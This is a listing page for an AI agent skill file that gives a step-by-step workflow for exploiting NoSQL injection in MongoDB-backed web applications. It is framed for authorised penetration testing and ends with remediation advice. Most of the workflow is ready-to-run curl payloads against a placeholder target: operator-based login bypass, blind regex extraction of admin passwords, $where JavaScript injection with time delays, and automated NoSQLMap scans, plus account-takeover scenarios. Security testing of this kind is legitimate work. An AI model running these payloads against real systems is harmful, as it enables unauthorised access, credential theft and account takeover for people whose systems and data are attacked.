exploiting-nosql-injection-vulnerabilities

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

16 stars

Best use case

exploiting-nosql-injection-vulnerabilities is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

Teams using exploiting-nosql-injection-vulnerabilities should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/exploiting-nosql-injection-vulnerabilities/SKILL.md --create-dirs "https://raw.githubusercontent.com/plurigrid/asi/main/plugins/asi/skills/exploiting-nosql-injection-vulnerabilities/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/exploiting-nosql-injection-vulnerabilities/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How exploiting-nosql-injection-vulnerabilities Compares

Feature / Agentexploiting-nosql-injection-vulnerabilitiesStandard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# Exploiting NoSQL Injection Vulnerabilities

## When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction

## Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (`pip install nosqlmap` or from GitHub)
- Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting

## Workflow

### Step 1 — Identify NoSQL Injection Points
```bash
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'
```

### Step 2 — Perform Authentication Bypass
```bash
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'
```

### Step 3 — Extract Data Using Boolean-Based Blind Injection
```bash
# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
```

### Step 4 — Exploit JavaScript Injection via $where
```bash
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'
```

### Step 5 — Use NoSQLMap for Automated Testing
```bash
# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
```

### Step 6 — Test URL Parameter Injection
```bash
# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass | Using operators to match any document and bypass login checks |
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell | Direct database interaction for testing query behavior |
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
| Nuclei | Template-based scanner with NoSQL injection detection templates |
| Postman | API testing platform for crafting NoSQL injection requests |

## Common Scenarios

1. **Login Bypass** — Bypass MongoDB-backed authentication using `{"$ne": ""}` operator injection in username and password fields
2. **Data Enumeration** — Extract database contents character by character using `$regex` blind injection when no direct output is visible
3. **Privilege Escalation** — Modify user role fields through NoSQL injection in profile update endpoints
4. **API Key Extraction** — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
5. **Account Takeover** — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

## Output Format

```
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls
```

Related Skills

triaging-vulnerabilities-with-ssvc-framework

16
from plurigrid/asi

Triage and prioritize vulnerabilities using CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree framework to produce actionable remediation priorities.

testing-for-xxe-injection-vulnerabilities

16
from plurigrid/asi

Discovering and exploiting XML External Entity injection vulnerabilities to read server files, perform SSRF, and exfiltrate data during authorized penetration tests.

testing-for-xss-vulnerabilities

16
from plurigrid/asi

Tests web applications for Cross-Site Scripting (XSS) vulnerabilities by injecting JavaScript payloads into reflected, stored, and DOM-based contexts to demonstrate client-side code execution, session hijacking, and user impersonation. The tester identifies all injection points and output contexts, crafts context-appropriate payloads, and bypasses sanitization and CSP protections. Activates for requests involving XSS testing, cross-site scripting assessment, client-side injection testing, or JavaScript injection vulnerability testing.

testing-for-xss-vulnerabilities-with-burpsuite

16
from plurigrid/asi

Identifying and validating cross-site scripting vulnerabilities using Burp Suite's scanner, intruder, and repeater tools during authorized security assessments.

testing-for-xml-injection-vulnerabilities

16
from plurigrid/asi

Test web applications for XML injection vulnerabilities including XXE, XPath injection, and XML entity attacks to identify data exposure and server-side request forgery risks.

testing-for-open-redirect-vulnerabilities

16
from plurigrid/asi

Identify and test open redirect vulnerabilities in web applications by analyzing URL redirection parameters, bypass techniques, and exploitation chains for phishing and token theft.

testing-for-json-web-token-vulnerabilities

16
from plurigrid/asi

Test JWT implementations for critical vulnerabilities including algorithm confusion, none algorithm bypass, kid parameter injection, and weak secret exploitation to achieve authentication bypass and privilege escalation.

testing-for-host-header-injection

16
from plurigrid/asi

Test web applications for HTTP Host header injection vulnerabilities to identify password reset poisoning, web cache poisoning, SSRF, and virtual host routing manipulation risks.

testing-for-email-header-injection

16
from plurigrid/asi

Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay.

testing-for-business-logic-vulnerabilities

16
from plurigrid/asi

Identifying flaws in application business logic that allow price manipulation, workflow bypass, and privilege escalation beyond what technical vulnerability scanners can detect.

prioritizing-vulnerabilities-with-cvss-scoring

16
from plurigrid/asi

The Common Vulnerability Scoring System (CVSS) is the industry standard framework maintained by FIRST (Forum of Incident Response and Security Teams) for assessing vulnerability severity. CVSS v4.0 (r

performing-second-order-sql-injection

16
from plurigrid/asi

Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.